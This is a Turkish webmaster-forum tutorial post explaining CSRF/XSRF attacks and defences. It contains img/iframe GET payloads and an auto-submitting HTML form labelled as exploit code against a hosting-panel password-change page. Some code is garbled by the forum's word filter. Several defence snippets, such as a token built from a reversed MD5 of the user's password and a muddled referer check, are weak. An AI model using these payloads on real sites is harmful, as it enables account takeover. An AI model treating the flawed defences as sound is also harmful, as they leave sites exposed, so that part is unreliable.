Forum Renkli - Türkiye`nin En Renkli Eğlence ve Bilgi Paylaşım Platformu  



"Taklitler, Asıllarını yaşatırmış."
Go Back   Forum Renkli - Türkiye`nin En Renkli Eğlence ve Bilgi Paylaşım Platformu > Webmaster Dünyası > Webmaster Dünyası > Webmaster Genel Bilgiler
Ücretsiz Kayıt ol veya Üye Girişi yapın.
Webmaster Genel Bilgiler Webmasterlık Hakkında Genel Bilgilerin Paylaşıldığı Bölüm

Forum Renkli - Türkiye'nin En Renkli Eğlence ve Paylaşım Platformuna Hoşgeldiniz.
Forum Renkli'ye Hoşgeldiniz. Forumumuza ücretsiz KAYIT olarak, forumumuzda bilgi alışverişi yapabilir ve aramıza katılıp samimi dostluklar kurabilirsiniz.

Forumumuzda bizimle birlikte paylaşıma katılmak için buradan üye olabilirsiniz.



veya Facebook üyeliğiniz ile sitemize kayıt olabilirsiniz.
Etiketli Üyeler Listesi

Yeni Konu Aç Cevap Yaz
 
LinkBack Seçenekler Stil
Alt 29 Aralık 2011, 19:26   #1 (permalink)
Death Surgeon

Hüseyiи. - ait Kullanıcı Resmi (Avatar)
Üyelik tarihi: 03 Ağustos 2011
Nerden: Karanlıklardan..
(Mesajlar): 8.363
(Konular): 2017
İlişki Durumu: Var
Burç:
Renkli Para : 403423
Aldığı Beğeni: 1924
Beğendikleri: 2408
Ruh Halim: Huzurlu
Takım :
ÖdülleriÜye Ödülleri: 1
Oscar Ödülü 
Standart CSRF/XSRF Saldırı & Korunma Yolları

Bu Anlatim Albeyaz-Bayrak.Org TIM Tarafindan Yapilmistir.İzinsiz Alinti Yapilmasi YASAKTİR !

CSRF (XSRF * Cross Site Request Forgery – Cross Site Reference Forgery ) Nedir?

Başlamadan Önce Size Kısaca bir Csrf(Xsrf) yani Cross Site Request Forgery Nedir ondan bahsetmek istiyorum. Cross Site Request For&submited=1”>)

Saldırı Şekilleri 1:https://www.domainsite.com/management/change_password.php?new_pass=seymen&verify_pass=se ymen&submited=1) bizde bunu bildiğimiz için bundan yararlanıcaz veya formlar oluşturarak işlemimizi gerçekleştireceğiz. Zaten amacımızda bu işlemleri gerçekleştirebilecek yetkiye sahip kişileri oturum açmış durumdayken kullanarak onlar yerine kendi kodlarımızı güvenilir kodlarmış gibi kullanıcıyı kullanarak göndermektir.
Ve bu saldırıları html veya javascript kodları kullanarak işlemesini sağlayabiliriz.(Örn:<img Yasak Kelime#8221;https://www.domainsite.com/management/change_password.php?new_pass=xxx&verify_pass=xxx]http://i33.tinypic.com/keypfd.jpg[/url]


Saldırganımız önceden saldırı için hazırladığı sitemizi kurbana yollar kurban gezerken kurbanın domain sitesinde işlem yapması için ya bir teşvikte bulunabilir saldırganımız* online olduğu bir zamanı seçebilir ya da kurbanın işi çıkıp girebilir girdiği anda online olduğu için yani çevirim içi sitenin kod kısmına yerleştirilmiş olan (Örn: <img Yasak Kelime#8221; https://www.domainsite.com/management/change_password.php?new_pass=xxx&verify_pass=xxx&s ubmited=1”> * <iframe Yasak Kelime#8221; https://www.domainsite.com/management/change_password.php?new_pass=xxx&verify_pass=xxx&s ubmited=1”>) gibi html kodları veya formlarla (javascript ile) saldırganımız kendi adına kişinin servera kodları yollamasını sağlar… Sonra olacak olan Şifrenin Değişmesidir. Bundan sonra saldırgan bunu ister başka bir java veya php codeyle işlemin gerçekleştiğini ya bir mail ile ya bir sniffer ile veya bilgisayarına bir log gönderterek öğrenmesi çok basit…






Ve kullanıcımızın tüm domainleri gidiyor. Neden? Çünkü kendisi için gerekli önlemleri almamış en basiti no-addon eklentisiyle mozilla’nın o javascript kodunun çalışmasını engelleyebilirdi html kodlarına da bilinmeyen bağlantıları engelleyerek önlem alabilirdi…

Saldırı Şekilleri 1:

Bu saldırı şeklimizde de yukarıda bahsettiğimiz formlarla saldırı şeklini kısaca gösterim…
Örneğin vhcs panelimizde bulunan bir csrf ile saldırganın neler yapabileceğini gösterim.
Exploit Code :

Kod:
 <script type="text/javascript">
function xxx(){
document.forms[0].submit();
}
</script>

</HEAD>
<bOdy onLoad="xxx()">
<xxx><html><bOdy> 
<form name="client_change_pass_frm" method="post" action="http://www.siteadress.com/admin/change_password.php">
<input type="password" name="pass" class="textinput"
value="passherre">
<input type="password" name="pass_rep" class="textinput" value="passhere">
<input type="hidden" name="uaction" value="updt_pass">
<input type="hidden" name="Submit" value="Update password">

</html></bOdy></xxx>
Exploit kodumuz yukarda göründüğü gibidir burada javascript kodu yardımıyla saldırgan tarafından kullanıcıya .html şeklinde gönderilerek online yani aktif halde bulunan kullanıcının server a şifre değiştirme isteğinde bulunmasını sağlayabiliriz. Bunun sonucunda panel şifresi değişti. Yine kurban elindekini kaybetti… Kendinizde bu saldırı şekillerini çoğaltabilirsiniz ben en çok kullanılan 2 yöntemi gösterdim…

Xss ve Xsrf Arasındaki İlişki:

Xss ve xsrf birbirini çok iyi tamamlayabilir bunu şöyle izah ettiğimde sanırım herkes anlayabilir örn: bir sitenin şifre değişme üzerine yazılmış bir xsrf açığı varsa ve kullanıcı adı da gerekiyorsa bununda aynı sayfaya yerleştirilmiş xss koduyla kolaylıkla alabiliriz yani bu 2 saldırı yöntemi aslında birbirine çok yardımcı yöntemlerdir…

Xsrf Den Korunma Yöntemleri:

3 ve daha fazla yöntemi vardır şimdi bunları açıklıcam.

1.Csrf $_POST Token Koruması

Bunu sizlere adım adım anlatmam daha mantıklı ve de açıklayıcı geldiği için böyle anlatcam…
1. Adım:

Bu kodu tüm <form method="POST"> kodlarından sonra echo() içerisinde eklemeniz önemlidir:
Code:
Kod:
 <input type="hidden" name="token" value="".$_SESSION[’token’]."" />
2. Adım:
Bu kodu config dosyanıza ekleyin
Code:
Kod:
if (isset($_USER[’id’])) { // your function to check if a user is logged in
if (empty($_SESSION[’token’]) || !isset($_SESSION[’token’])) { // if there is no token set
$_SESSION[’token’] = strrev(md5($_USER[’password’])); //set a token with   a reverse string and md5 encryption of the user’s password
}
if (CSRF_PROTECTED != false) { // if you did not define CSRF_PROTECTED as false
if ($_POST) { // if there is a form present
if ($_POST[’token’] != $_SESSION[’token’]) { // if the input token does not equal the session token
header("Location: /index.php"); // redirect to index
die(); // stops all $_POST data from being sent
}
}
}
}
3. Adım:
Bu kodu da tüm include ile config dosyalarını çeken php dosyalarına ekleyiniz
Code:
Kod:
 define("CSRF_PROTECTED"* false);
2.Csrf Captcha Koruması:

Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) kısaca kişinin üye olurken veya bir işlemi yaparken karşısına çıkna değişken sayı ve rakamlardan oluşan resimlerdir. Bu resimleri bir form da gerekli yere yazmadığımız sürece o işlem tamamlanmayacağı için csrf saldırıları için bir koruma teşkil etmektedir. Ama bundan öncede eğerki bu kurulumu zaten gerçekleştirmek istiyorsanız etkili kullanımı olan bir captcha kullanmanızı öneririm çünkü bazı sistemler captcha koyduğu halde aynı kodlar gösterilip duruyor veya bu kodlar okunabiliyor bu hataya düştükten sonra hiçbir anlamı olmaz captcha yı kullanmanın…

3.Browser Güvenliği:

Bunla da çok güvenilir de olmasa da kendimizce bir güvenlik oluşturabiliriz Örn: javascript kodları ile yapılan saldırılara karşı javascript kodlarının çalışmasını önleyerek ve ya html kodlarıyla yapılan saldırılara karşı yönlenecek siteleri engelleyerek ve ya kendi belirlediğimiz kodların filtre ile süzmesini sağlayarak engellenebilir…

4.HTTP_REFERER ile Engelleme:

Yani sizin istemediğiniz url den gelen istekleri reddederek bu kodları yollayan kişiyi farklı bir sayfaya yönlendirme işlemi ile csrf yöntemlerini engelleme tekniğidir..
Bunu aşağıdaki kodlarla sağlayabiliriz Örneğin:
Kod:
<?php
if (strstr($_SERVER[’HTTP_REFERER’]*" http://www.google.com ")) {
header ("Location: http://www.xxx.org/index.php");
} else {
header ("Location: http://xxxxxxxxx.org");
}
?>
Burada google.com dan gelmeyen bir isteği x12.org a yönlendirecek ama google.com dan gelen istege xxx.org u açacaktır bu kadar basit…

5.URL Rewrite:

URL Rewrite tekniği kısaca açıklamak gerekirse* sitemizdeki Url leri ?ID=30 şeklinden daha anlamlı olan baslik.html şekline çevirme işlemidir. Bunu yapmak uzun ve uğraşlı olabileceğinden ve tam sonuç alınamayacağından pek tavsiye edemem…

6.Get yerine Post kullanımı:

Get yerine Post kullanılması yukarıdaki birinci saldırıyı etkisiz kılmaya yarayabilir yani post kullanımında <img Yasak Kelime#8221;”> ile resim paylaşımına izin verilebilir buda yukarıdaki saldırının resim olarak gözükmesine ve de x yani yanlış url olduğunu belli etmesini sağlar fakat saldırgan bunu javascript kodlarıyla atlatabileceği için tavsiye edemem…

7. <input type=”hidden”> ile Korunma:

Bu kodumuzla sitemizin kaynak kısmına yerleştirebileceğimiz çeşitli değişken değerler (Örn:md5* herhangi başka değerler) bu yöntemin etkisiz kalmasını sağlayabilir bu en çok tavsiye edebileceğim yöntemlerdendir…





"Yürekten sevdiğin bir insan varsa, bir kişi olsun yeter,
hayatın kurtulmuş demektir…"
1Q84 - Haruki Murakami


Hüseyiи. isimli Üye şimdilik offline konumundadır   Alıntı
Yeni Konu Aç Cevap Yaz

Etiketler
csrf or xsrf, korunma, saldırı, yolları


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık


Forum Renkli Sosyal Medya
Forumrenkli Facebook Forumrenkli Twitter Forumrenkli RSS
Forum Renkli Desteklediklerimiz

Forum Renkli Yasal Uyarı!

Forum Renkli Türkiye'nin en renkli eğlence ve bilgi paylaşım platformudur. Hukuka, yasalara, telif ve kişilik haklarına bağlıdır. "5651 sayılı yasada" belirtilen "Yer Sağlayıcı" olarak hizmet sunmaktadır. İlgili yasaya göre site yönetiminin tüm içerikleri kontrol etme yükümlülüğü yoktur. Bu sebep ile sitemiz, uyarıları dikkate alarak yasa dışı paylaşımlar hakkında gerekli işlemleri yapmaktadır. Oluşabilecek yasal sorumluluklar "Üyelerimize" aittir.

Forum Renkli; Arkadaşlık, Dostluk, Eğlence, Paylaşım, Msn Nickleri, Msn Sözleri, Msn Avatarları, Ödüllü Yarışmalar, Msn Sözleri, Şiirler, Şarkılar, Moda, Sağlık, Tv, Dizi, Film, Komik, Komik Resimler, Komik Videolar, Haberler, Spor Haberleri ve Güncel Bilgi Paylaşımı gibi konuların kullanıcıları tarafından önceden onay almadan anında yayınlayabildikleri bir forumdur.

Copyright© 2011 - 2013, ForumRenkli.com® Tüm Hakları Saklıdır.


Forum Renkli Alexa Forum Renkli Sitemap



vBulletin® Version 3.8.7 ile güçlendirilmiştir.
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd
Inactive Reminders By Realdizayn

Search Engine Optimization by vBSEO 3.6.1 ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557